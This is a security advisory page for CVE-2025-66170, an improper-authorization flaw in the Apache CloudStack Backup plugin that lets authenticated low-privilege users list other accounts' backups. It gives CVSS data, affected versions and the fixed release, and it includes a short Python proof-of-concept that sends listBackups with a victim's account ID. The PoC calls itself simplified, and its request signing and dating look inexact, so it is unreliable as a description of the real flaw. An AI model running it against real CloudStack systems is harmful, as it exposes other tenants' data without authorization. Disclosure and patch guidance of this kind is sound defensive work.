Security Vulnerability Report: CVE-2025-66170

CVSS 6.5 MEDIUM

Published: 2026-05-08 13:16:35
Last Modified: 2026-05-11 15:24:18

Description

The CloudStack Backup plugin has improper authorization logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in a CloudStack 4.21.0.0+ environment where this plugin is enabled, and who has access to specific APIs, can list backups from any account in the environment. This vulnerability does not allow them to see the contents of the backups. Users are recommended to upgrade to version 4.22.0.1, which fixes the issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* - VULNERABLE (versions from 4.21.0.0 up to, but excluding, 4.22.0.1)
Apache CloudStack 4.21.0.0
Apache CloudStack 4.22.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: Apache CloudStack Backup Plugin Privilege Escalation (List Backups)
# Date: 2025-05-08
# Exploit Author: Analyst
# Vendor Homepage: https://cloudstack.apache.org/
# Version: 4.21.0.0, 4.22.0.0


def exploit(target_url, api_key, victim_account_id):
    """
    Attempts to list backups for a specific victim account using a low-privilege user.
    """
    # API endpoint for listing backups (example endpoint structure)
    endpoint = f"{target_url}/client/api"

    # Payload parameters simulating the API command
    command = "listBackups"
    params = {
        "command": command,
        "accountid": victim_account_id,  # The vulnerable parameter: overriding account context
        "response": "json",
    }

    # Signing the request (simplified for PoC)
    headers = {
        "Cookie": f"JSESSIONID={api_key}",
        "Authorization": f"Bearer {api_key}",
    }

    try:
        response = requests.get(endpoint, params=params, headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] Successfully retrieved backup list:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    target = "http://cloudstack-target:8080"
    # Replace with valid credentials for a low-privilege user
    low_priv_api_key = "LOW_PRIV_USER_API_KEY"
    # Target account ID to enumerate
    target_account = "admin-uuid-or-id"
    exploit(target, low_priv_api_key, target_account)
```

References

Weakness: CWE-863 (Incorrect Authorization)

- https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm (Mailing List, Third Party Advisory)
- http://www.openwall.com/lists/oss-security/2026/05/09/1 (Mailing List, Third Party Advisory)